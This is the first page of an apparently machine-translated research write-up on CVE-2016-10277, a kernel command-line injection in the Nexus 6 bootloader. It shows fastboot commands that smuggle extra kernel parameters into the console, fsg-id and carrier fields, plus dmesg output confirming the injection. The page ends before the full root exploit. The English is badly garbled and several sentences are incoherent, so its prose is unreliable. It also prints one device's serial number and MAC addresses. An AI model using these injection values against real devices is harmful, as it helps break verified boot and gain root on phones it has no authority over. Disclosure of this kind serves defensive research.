How to pass kernel command injection bypass Nexus 6 safe start mode-bug warning-the black bar safety net

In 2017 5 on the Android security announcements, Google released a security patch that fixes the Nexus 6 bootloader in the discovery of a serious Vulnerability, CVE-2016-10277 in.
Exploit this vulnerability, a physical attacker or a already have the bootloader locked down the target device ADB/fastboot USB access permission of the user, such as malicious software can wait with ADB permissions of the developers of the device through the USB interface into the host to be able to break the safety devices or authenticated boot mechanism, by loading a carefully constructed malicious initramfs image, the attacker can obtain the target device’s root access, complete control of the device of the user spaces in this space can be implemented more. In addition, the exploit process will not cause the device to restore to factory settings, so user data will remain unchanged and is still in the encrypted state. Note that the demo is not a not subject to any conditions the attack process.
In the vulnerability research process, we also found a 18-year-old Linux kernel vulnerabilities the vulnerability will not be on the Nexus 6 caused by the impact, and therefore may not affect any Android device: CVE-2017-1000363 it.

One, Foreword
2017 1 month, we disclose a high-risk Vulnerability, CVE-2016-8467 this vulnerability Nexus 6/6P, allowing the attacker to change the device boot mode, which enables access to the device hides a USB interface. Vulnerability through the fastboot command trigger such as fastboot oem config bootmode bp-tools, this command will cause the bootloader to change the kernel command line in the androidboot. mode parameters. Google by reinforcing the bootloader fixed this vulnerability, after locking the bootloader no longer does not support self-defined start mode to start.
Second, the vulnerability analysis: the kernel command injection Vulnerability, CVE-2016-10277）
Nexus 6 bootloader contains many parameters, where some parameters can be through fastboot interface control, even if the bootloader is locked also can:
$ fastboot oem config
[…]
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader) Battery detection control
(bootloader) (“meter_lock” or “no_eprom”)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader) To force certain bootmode
(bootloader) (valid values are “fastboot”, “factory”, “bp-tools”, “q
(bootloader) com”, and “on-device-diag”)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader) Carrier IDs, see http://goo.gl/lojLh3
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader) Config the kernel console log
(bootloader) enable|true - enable with default settings
(bootloader) disable|false - disable
(bootloader) - enable with customized settings
(bootloader) (e.g.: “ttyHSL0”, “ttyHSL0,230400,n8”)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader)
(bootloader) FSG IDs, see http://goo.gl/gPmhU
(bootloader)
(bootloader)
OKAY [ 0.048 s]
finished. total time: 0.048 s
fsg-id, carrier, and console of these three parameters can contain any value, although the size of the parameter subject to limits, these three parameters will eventually be passed to the kernel command line. We can use the following command to verify the vulnerability:
$ fastboot oem config console foo
$ fastboot oem config fsg-id bar
$ fastboot oem config carrier baz
Then check the kernel command-line:
shamu:/ $ dmesg | grep command
[ 0.000000] Kernel command line: console=foo,115200,n8 earlyprintk
androidboot. console=foo androidboot. hardware=shamu msm_rtb. filter=0x37
ehci-hcd. park=3 utags. blkdev=/dev/block/platform/msm_sdcc. 1/by-name/utags
utags. backup=/dev/block/platform/msm_sdcc. 1/by-name/utagsBackup coherent_pool=8M
vmalloc=300M buildvariant=user androidboot. bootdevice=msm_sdcc. 1 androidboot. serialno=ZX1G427V97
androidboot. baseband=mdm androidboot. version-baseband=D4. 01-9625-05. 45+FSG-9625-02.117
androidboot. mode=normal androidboot. device=shamu androidboot. hwrev=0x83A0
androidboot. radio=0x7 androidboot. powerup_reason=0x00004000 androidboot. bootreason=reboot
androidboot. write_protect=0 restart. download_mode=0 androidboot. fsg-id=bar
androidboot. secure_hardware=1 androidboot. cid=0xDE androidboot. wifimacaddr=F8:CF:C5:9F:8F:EB
androidboot. btmacaddr=F8:CF:C5:9F:8F:EA mdss_mdp. panel=1:dsi:0:qcom,mdss_dsi_mot_smd_596_QHD_dualmipi0_cmd_v0
androidboot. bootloader=moto-apq8084-72.02 androidboot. carrier=baz androidboot. hard
Now, if the bootloader is not on the These parameters to the filtering process, then we will be able to pass any kernel kernel command line parameters:
$ fastboot oem config console “a androidboot. foo=0”
$ fastboot oem config fsg-id “a androidboot. bar=1”
$ fastboot oem config carrier “a androidboot. baz=2”
The result is indeed true:
shamu:/ $ dmesg | grep command

[1] [2] [3] [4] [5] [6] next